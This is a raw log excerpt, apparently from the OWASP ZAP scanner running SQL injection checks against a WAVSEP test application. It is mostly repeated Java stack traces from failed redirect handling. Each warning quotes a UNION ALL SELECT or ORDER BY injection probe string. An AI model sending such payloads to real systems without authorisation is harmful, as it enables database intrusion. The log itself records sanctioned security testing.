org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679361 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679361 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679362 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679363 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679364 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679364 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679366 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679366 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 5873-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 5873-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679368 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679368 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679369 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679370 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679371 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- ] due to an I/O error 